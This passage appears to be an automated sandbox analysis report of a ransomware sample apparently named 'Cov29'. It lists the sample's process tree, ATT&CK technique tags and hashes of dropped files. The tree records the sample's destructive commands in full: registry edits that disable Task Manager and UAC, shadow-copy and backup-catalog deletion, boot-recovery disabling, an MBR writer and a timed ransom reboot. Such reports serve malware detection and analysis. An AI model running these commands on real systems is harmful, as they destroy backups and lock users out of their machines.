C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:5112
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:3116
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:1444
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:764
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2160
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:4580
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:1468
-
-
C:\Users\Admin\AppData\Local\Temp\4699.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:788
-
-
C:\Users\Admin\AppData\Local\Temp\4699.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:5048
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:4888
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:2260
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:2144
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:3104
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:292
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵PID:1480
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- Runs ping.exe
PID:2888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\4699.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5256
-
-
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3328
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:396
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1124
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD56876cbd342d4d6b236f44f52c50f780f
SHA1a215cf6a499bfb67a3266d211844ec4c82128d83
SHA256ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e
SHA512dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039
-
Filesize
152B
MD5c1c7e2f451eb3836d23007799bc21d5f
SHA111a25f6055210aa7f99d77346b0d4f1dc123ce79
SHA256429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800
SHA5122ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize3KB
MD57cc7f15bc572fa51710046c278b4f5d5
SHA155fbe920f901d3ab06ab89cf8b26b73b6873ccae
SHA256ed6142349e253eae30e307f3fe8b5d9caa5a004aaada4c0d82895d85e9948491
SHA512595254d390d777e05429d5d126417db0e42ca58f88a3a55fdfb6793e63d164d9ea3da864fc9ceb67b04d58ace42c7aff37302c21c99b8df6536245f9b6250d81
-
Filesize
1KB
MD545c3d5d2a85cb4970417670110e4e218
SHA162b006dd9eafecfe08df77eab3e356803cd1b7d5
SHA2564653ab919211ac02062e70bbafbdbe4939cd7b5badaa8f84343e1666e49afad2
SHA512cecaf6184ad32e4c93d725e8d1c869bb5649d79b1e7148a936e9235cd8e6e2acf1204331ab2454b8fdeea6aa8d9f083d892fa1d1eb6c9632b9df6fc49ecbc6ab
-
Filesize
1KB
MD5e2877b602cd68bb4e7c5097775bf4597
SHA1e9aa81dc583617e07a73bb0f7271f7cc2396d786
SHA25666ea369846b3988af56d3dce167ef668ffdcde3a34551369a61bdaa6bbe887d2
SHA5126a3f258bcb6c31631db0dcc0af0260f0bf29188bd7be8264e44cf74db9b26dfbab9e221353dbdcf92f6984f9bbf95d927d23718ca6c9bedbba094a922e082825
-
Filesize
5KB
MD548294174b36b1a86494e972639bb40f8
SHA1bc58835e41612d7341828c344b7c728d80b5a7ee
SHA2568d4c85acaa0a2bd634b226dc2002cd1b6b7d8bdeca434b2847e8e113b169eb9d
SHA512997e060a904eef33933c1c498d74574dc14e3230ac15f761e82c83256f32b7f90545d89a14d228fd78e246d825db94edc6cefd00fd273a015193f3dcc0e8e0f1
-
Filesize
7KB
MD5a45b67a18b91512e3ab44af9393a736f
SHA1db4105364489626a3bc3eac62345ee8ff7c35133
SHA256fe91ba04f2396d0ca823f73746847b552181508884b9543c452958bfd44c51f6
SHA512debd6ae24fe8ea7dade2ccc79ae5199c55d40b9b463d647bc453260396f275f5b1fb200a19137bf4002e25fae1b97afa7fdf43bbde1e94740c42cc2696c186e8
-
Filesize
6KB
MD58c50997873715ad1ecd9acc34f61a314
SHA12b6a14ebc7b1cc363ecfb7fb2b97a2f0ddf5c630
SHA256c859d0a38c2054055bf3a60d28293f8b4476f4784c9d3e7e0df85c8ae393fa35
SHA512e754e02ffce97d9b85bd531545f4c62218396192d698eabd7dd955e904a576fd80abc5829735b0f4478c300251bf6178fad19bd42a4640c9f96fb0baefa3cfa1
-
Filesize
1KB
MD5107f1fe67535400a6870a3de747f739c
SHA1334a22019fdb217a44f8527a99daa9a9ee741d5f
SHA2564b27304b6fc41d12993654859f4e7722603f3de1a5ca159c90df5bb02d3a68a2
SHA512a7fd2f42b5c236b3175bc7b108b1a4b44bbe3fc08e66ce75c7cf6b754e3a8ad3e0f4de4a7fc85e5ef9b59989cc79f262a0c947fe54a1d432ed7d37e184b7603e
-
Filesize
1KB
MD574d436fe71bdd5eef3f9cb14ffbe2d2e
SHA14bfc6fcf90a76f08bc52d7a58968073e6cac14b9
SHA256e879afcac3618075222bb3cc796cd5ba2e8d411516db0b1e4de32c345e59f8f9
SHA512b3a0e67cdd50b1dac20ccd988d2d288f6e6f9341beb880bdce9c53b587a96ffb7ca32781ef91882a07ba54775ce968a8d43ffb0666655d68490420a4475d54a1
-
Filesize
1KB
MD5473acce8778c9273a3391f1a5050ea47
SHA128728a8eb2933bb701dc98a33215eab7d748ae2e
SHA256c63de01a909fe7a8f8800d9b0b60d97ae5d7123cbf7359a58fd97b9428f6abd4
SHA512344ee953defb44ca4fedbfa79dc380fb575fe28e6d72ff578334030840b9a9beeeff9bbb2426cac51dfe3d0cb4a9d4395505b066a895b0e4be67e6ceb23c6bc1
-
Filesize
1KB
MD52de0cd84755d40c0749fa4659030627a
SHA1e0ebd163a9b7dbc90ace251a1ddcd0c252c6ee73
SHA256fe8fabd3e60869258d7d6525ebc04d4ff7ee2f30b29a10a4706f21acdb0dbc51
SHA512452736bc74c85c1df4ea7d68acf9584689a27f928ec4a415a00bd4d3253dcbfdd978e0339d64d9b7a333233d1533e372c7884771d7d3aecb19fc1ebeb2093685
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f3810c96-e0a5-41d5-9415-d3d129d7f6c9.tmp
Filesize6KB
MD5725ea913669acd6d93dc27ae9e3f024a
SHA193d5f7b1525a24a22da0272beb0129cf288bf0e9
SHA2568d95265db86a75a2a263c86f686c6474d8576d14ba68d8443019391f4feb6f61
SHA5129f80b5e14e050a99b5220b7fb572add84237b075f9532211fbdd50fd57dd161ca12d7bee941832fa4e581a62793656768bd344a21e00500ff97c988cda470ddb
-
Filesize
11KB
MD538687f04e87f3a7e0b195b45556f031b
SHA1599325e00b88ea27771133a1c0532b47b4229881
SHA256b80e9e59805fbce1f9da201e37b3698c9e1cef41baa62b852e4b3a35d50bbfdb
SHA512e969d5b1e51006fe51b1b9e6463ee5542957ce477496b84d38c3fe7217e6bf83b0d6dca2405083bcad313a116973e73178eefb7ab0c83e298cbd7e0be0dc4619
-
Filesize
10KB
MD5ccf60b0814afd05b039eca6e13253e33
SHA108a753098260ec0d34930e012ec40fbc28958345
SHA25658ce03ca84708f22036bdebeb4e34a1af676090e6c87467a391c25fa253c06bd
SHA512808583f4fbfb1b263b734f08f47d899780fb4a881049ecd2b6a6e7d7f7282b60e7991a721c94dc790fa8a7fe539c2bf5d85d6fb1806ce5e4658290687aebe09d
-
Filesize
11KB
MD55154441e2d588a364bd0e6cf193b6d6d
SHA16139a3c14575ef33d9d6e2103154bb600d8fb3bc
SHA25651412b4326d6a9e4cb9922ebdae42f254b11f5134345318a12d0baa0bf9583ef
SHA51209c9e0828284c0da5f303e25bf0420ed17c4185b63b944a0651ff39e212e54fa6d935c2b650c3d555f46a1d398e7efc1a5201950549af87b3c43776d5536eaac
-
Filesize
11KB
MD58b3c5116e7b6fb1562ac60d6ae06b92e
SHA1ce06970e2a843f27534da84e4034cc7f2013b437
SHA25656c3f2082e198b8e2370c55898895e7873695836eef9a95a67127816d56f167f
SHA51286520a98e379b7c3ad1f48ddcfc1e3be84448f11e985c8bb1066c9a18ac1ea9be5429bfcb59accac5b5f452be241321d1f96532c839a9e0b3a70bc355e9d6ab8
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
48KB
MD5f724c6da46dc54e6737db821f9b62d77
SHA1e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA2566cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA5126f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc
-
Filesize
1KB
MD557f0432c8e31d4ff4da7962db27ef4e8
SHA1d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c
-
Filesize
1.7MB
MD5272d3e458250acd2ea839eb24b427ce5
SHA1fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c
-
Filesize
268B
MD5cc5daa5e579a9052ed7eb1b6f3d65779
SHA1adf793f0bc9a645e6793d4838524f59c4ff27074
SHA256def828abad22f799785354f6af5c2396103d734bb7c20f96b3e62cd0d55d8398
SHA512af7418c56e2f66f74f1a25fed7f9bc3e2a19fbbdc6cc97d6b52f6bb058deace600ace6a349249dc138398c186e4f23ea93df7bfa6f46f4907ca416b46ea87f21